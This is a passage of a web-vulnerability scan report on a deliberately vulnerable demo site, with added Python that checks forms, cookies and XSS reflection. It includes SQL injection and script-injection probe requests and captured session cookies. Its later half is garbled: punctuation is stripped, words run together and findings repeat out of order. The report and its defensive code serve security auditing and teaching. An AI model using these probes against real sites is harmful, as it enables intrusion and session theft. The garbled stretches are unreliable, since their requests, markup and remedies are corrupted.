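    print("500 JSON  :", classify_reflection(JSON_500_FRAGMENT, "application/json; charset=utf-8"))
    print("/Supercar/3:", classify_reflection(IDENTIFICATION_FRAGMENT, "text/html; charset=utf-8"))
    print("fixed cell :", render_cell_fixed(STORED_PROBE))
    print("hardened   :", error_json_hardened(REFLECTED_PROBE)[1])
```

Run as-is, the 500 body classifies as "non-html" and the /Supercar/3 fragment as "html"; after `render_cell_fixed` or `error_json_hardened` neither probe matches any more. The encoding is per output context: `html.escape` is right for text inside an element or a quoted attribute, but a value placed inside a script block or a URL needs the encoder for that context, which is the point of the "according to the output format and location" wording in the Remedy.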
1 TOTAL IMPORTANT
CONFIRMED 1

5. Password Transmitted over HTTP

Netsparker detected that password data is being transmitted over HTTP.

Impact
If an attacker can intercept network traffic, he/she can steal users' credentials.

Actions to Take
1. See the remedy for solution.
2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.

Classification
OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04

5.1 /Account/Register CONFIRMED
http://hackyourselffirst.troyhunt.com/Account/Register
Form target action: http://hackyourselffirst.troyhunt.com/Account/Register
Request
GET /Account/Register HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2265
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>Register - Supercar Showdown</title>
<link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<meta name="viewport" content="width=device-width" />
<link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet" />
</head>
<body>
<header class="navbar-wrapper">
<div class="container">
<div class="navbar navbar-inverse">
<div class="navbar-inner">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span>
</button>
<a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a>
<div class="nav-collapse collapse">
<ul class="nav">
<li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a>
<ul class="dropdown-menu">
<form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form>
<li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li>
<li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
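Findings 8 (Critical Form Served over HTTP) and 5 (Password Transmitted over HTTP) reduce to two checks on any form that carries a password field: was the page holding the form fetched over http://, and does the form's resolved action point at http://. The login page fails only the first (its action is https://); the register page fails both. The Python below is an added example, not part of the Netsparker report or of the scanned application: it re-implements those two checks over constructed HTML. The page URLs and form actions match the "Form target action" lines of 8.1 and 5.1, but the `<form>` markup itself is assumed, because the report truncates both pages before the form.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    """Collect every <form> on a page and note whether it holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []        # one dict per <form>: action, method, has_password
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").lower(),
                "has_password": False,
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "text").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def check_critical_forms(page_url, page_html):
    """Return [(finding, resolved_action), ...] for every form with a password field.

    CRITICAL_FORM_SERVED_OVER_HTTP  the page holding the form came over http://, so a
                                    MITM can rewrite the form regardless of where its
                                    action points (finding 8).
    PASSWORD_TRANSMITTED_OVER_HTTP  the resolved form action is http://, so the
                                    credentials themselves cross the wire in clear
                                    text (finding 5).
    """
    collector = _FormCollector()
    collector.feed(page_html)
    page_scheme = urlsplit(page_url).scheme.lower()
    findings = []
    for form in collector.forms:
        if not form["has_password"]:
            continue
        # An empty or relative action resolves against the page URL.
        action = urljoin(page_url, form["action"] or page_url)
        if page_scheme != "https":
            findings.append(("CRITICAL_FORM_SERVED_OVER_HTTP", action))
        if urlsplit(action).scheme.lower() != "https":
            findings.append(("PASSWORD_TRANSMITTED_OVER_HTTP", action))
    return findings


# Constructed samples. Page URLs and form actions follow the "Form target action"
# lines of 8.1 and 5.1; the form markup is assumed (the report truncates both
# pages before the <form>).
LOGIN_PAGE_URL = "http://hackyourselffirst.troyhunt.com/Account/Login"
LOGIN_HTML = """
<form action="https://hackyourselffirst.troyhunt.com/Account/Login" method="post">
  <input name="Email" type="text" />
  <input name="Password" type="password" />
  <input name="RememberMe" type="checkbox" value="true" />
</form>
"""

REGISTER_PAGE_URL = "http://hackyourselffirst.troyhunt.com/Account/Register"
REGISTER_HTML = """
<form action="http://hackyourselffirst.troyhunt.com/Account/Register" method="post">
  <input name="Email" type="text" />
  <input name="Password" type="password" />
  <input name="ConfirmPassword" type="password" />
</form>
"""

if __name__ == "__main__":
    for url, markup in ((LOGIN_PAGE_URL, LOGIN_HTML), (REGISTER_PAGE_URL, REGISTER_HTML)):
        for finding, action in check_critical_forms(url, markup):
            print(f"{finding}  page={url}  action={action}")
```

In ASP.NET MVC the usual fix for both findings is `[RequireHttps]` on the login and register actions (or registered as a global filter), so that the page carrying the form is itself never served over HTTP. Posting to an https:// action from an http:// page is not enough, which is why 8.1 is rated confirmed even though the login form targets HTTPS: whoever can rewrite the HTTP page can also rewrite that action.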
1 TOTAL IMPORTANT
CONFIRMED 1

6. Cookie Not Marked as Secure

Netsparker identified a cookie that is not marked as secure and is set over HTTPS.
This means the cookie could potentially be stolen by an attacker who can intercept the victim's traffic, for example following a successful man-in-the-middle attack, because the browser will also send it over plain HTTP where no decryption is needed.

Impact
This cookie will be transmitted over an HTTP connection; therefore, if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a man-in-the-middle attack, he/she can force the victim to make an HTTP request to steal the cookie.

Actions to Take
1. See the remedy for solution.
2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)

Remedy
Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation
To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to understand layer 2, have physical access to systems either as waypoints for the traffic, or have locally gained access to a system between the victim and the web server.

External References
.NET Cookie.Secure Property
How to Create Totally Secure Cookies

Classification
OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-614, CAPEC-102, WASC-15

6.1 /Account/Login CONFIRMED
https://hackyourselffirst.troyhunt.com/Account/Login
Identified Cookie: AuthCookie
Request
POST /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/Account/Login
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded

Email=netsparker%40example.com&Password=3&RememberMe=true
Response
HTTP/1.1 302 Found
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:00 GMT
Location: http://hackyourselffirst.troyhunt.com/
Server: Microsoft-IIS/8.0
Set-Cookie: AuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Password=Mw==; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Email=netsparker@example.com; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 155
Content-Type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://hackyourselffirst.troyhunt.com/">here</a>.</h2></body></html>
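The 302 above sets three cookies and none of them carries Secure or HttpOnly. Finding 6 names only AuthCookie, but the same response also persists Password=Mw== and Email=netsparker@example.com for a year; Mw== is simply the base64 encoding of the password "3" that was just POSTed, reversible rather than hashed. The Python below is an added example, not part of the Netsparker report or of the scanned site: it parses Set-Cookie values, applies the report's own decision rule (flag a missing Secure or HttpOnly, optionally only for cookies you treat as sensitive), and builds the hardened header for comparison. The sample headers are the three from the response above with the AuthCookie value shortened; the list of names used to spot credential cookies is an assumed heuristic.

```python
import base64

# Set-Cookie values from the /Account/Login 302 above (constructed copy; the
# AuthCookie value is shortened here).
SET_COOKIE_HEADERS = [
    "AuthCookie=83F87081CDBC4CAC96FBBA3C773F139F; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/",
    "Password=Mw==; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/",
    "Email=netsparker@example.com; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/",
]

# Assumed heuristic: cookie names that point at a credential being stored client-side.
CREDENTIAL_COOKIE_NAMES = {"password", "passwd", "pwd"}


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, attributes).

    Attribute keys are lower-cased; flag attributes (Secure, HttpOnly) map to True.
    Splitting on ';' only keeps the comma inside 'expires=Tue, 25-Aug-2015 ...' intact.
    """
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, has_value, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if has_value else True
    return name.strip(), value, attrs


def audit_cookies(set_cookie_headers, sensitive=None):
    """Return [(cookie_name, finding), ...].

    sensitive: optional set of lower-cased cookie names to hold to the Secure/HttpOnly
    rule. None applies the rule to every cookie, the safe default; the report only
    exempts cookies unrelated to authentication or personal data.
    """
    findings = []
    for header in set_cookie_headers:
        name, _value, attrs = parse_set_cookie(header)
        lname = name.lower()
        if lname in CREDENTIAL_COOKIE_NAMES:
            findings.append((name, "CREDENTIAL_STORED_IN_COOKIE"))
        if sensitive is not None and lname not in sensitive:
            continue
        if attrs.get("secure") is not True:
            findings.append((name, "COOKIE_NOT_MARKED_AS_SECURE"))
        if attrs.get("httponly") is not True:
            findings.append((name, "COOKIE_NOT_MARKED_AS_HTTPONLY"))
    return findings


def build_set_cookie(name, value, *, path="/", secure=True, httponly=True, samesite="Lax"):
    """Hardened header for comparison: Secure keeps it off plain HTTP, HttpOnly away from script."""
    parts = [f"{name}={value}", f"path={path}"]
    if secure:
        parts.append("Secure")
    if httponly:
        parts.append("HttpOnly")
    if samesite:
        parts.append(f"SameSite={samesite}")
    return "; ".join(parts)


def decode_base64_cookie(value):
    """Show that a base64 cookie value is encoding, not hashing: Mw== is just '3'."""
    return base64.b64decode(value).decode("utf-8")


if __name__ == "__main__":
    for name, finding in audit_cookies(SET_COOKIE_HEADERS):
        print(f"{finding}: {name}")
    print("Password cookie decodes to:", decode_base64_cookie("Mw=="))
    print("hardened:", build_set_cookie("AuthCookie", "83F87081CDBC4CAC96FBBA3C773F139F"))
```

For an ASP.NET application the blanket equivalent of `build_set_cookie` is `<httpCookies requireSSL="true" httpOnlyCookies="true" />` under `<system.web>` in web.config, or `Secure = true` and `HttpOnly = true` on each `HttpCookie` (the Cookie.Secure reference under finding 6). The Password cookie has no hardened form; it should not be set at all.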
1 TOTAL IMPORTANT

7. Out-of-date Version (Microsoft SQL Server)

Netsparker identified that you are using an out-of-date version of Microsoft SQL Server.

Impact
Since this is an old version of the software, it may be vulnerable to attacks.

Remedy
Please upgrade your installation of Microsoft SQL Server to the latest stable version.

Classification
OWASP 2010-A6, OWASP 2013-A9, PCI V2.0-6.1, PCI V3.0-6.1, CAPEC-310

7.1 /Make/1
http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Identified Version: 11.0.9222.17
Latest Version: 12.0.2000
Vulnerability Database: result is based on 18/08/2014 vulnerability database content.
Certainty
Request
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:55 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title>
<meta name="viewport" content="width=device-width" />
<style>
 body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
 p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
 b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
 H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
 H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
 pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt}
 .marker {font-weight: bold; color: black;text-decoration: none;}
 .version {color: gray;}
 .error {margin-bottom: 10px;}
 .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
 @media screen and (max-width: 639px) {
  pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; }
 }
 @media screen and (max-width: 479px) {
  pre { width: 280px; }
 }
</style>
</head>
<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please revie…
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
1 TOTALIMPORTANT
CONFIRMED
1
5 Password Transmitted over HTTPNetsparkerdetectedthatpassworddataisbeingtransmittedoverHTTP
ImpactIfanattackercaninterceptnetworktrafficheshecanstealuserscredentials
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformsandpagestoHTTPSanddonotservethemoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
51 AccountRegister CONFIRMEDhttphackyourselffirsttroyhuntcomAccountRegister
Form target actionhttphackyourselffirsttroyhuntcomAccountRegister
Request:
GET /Account/Register HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
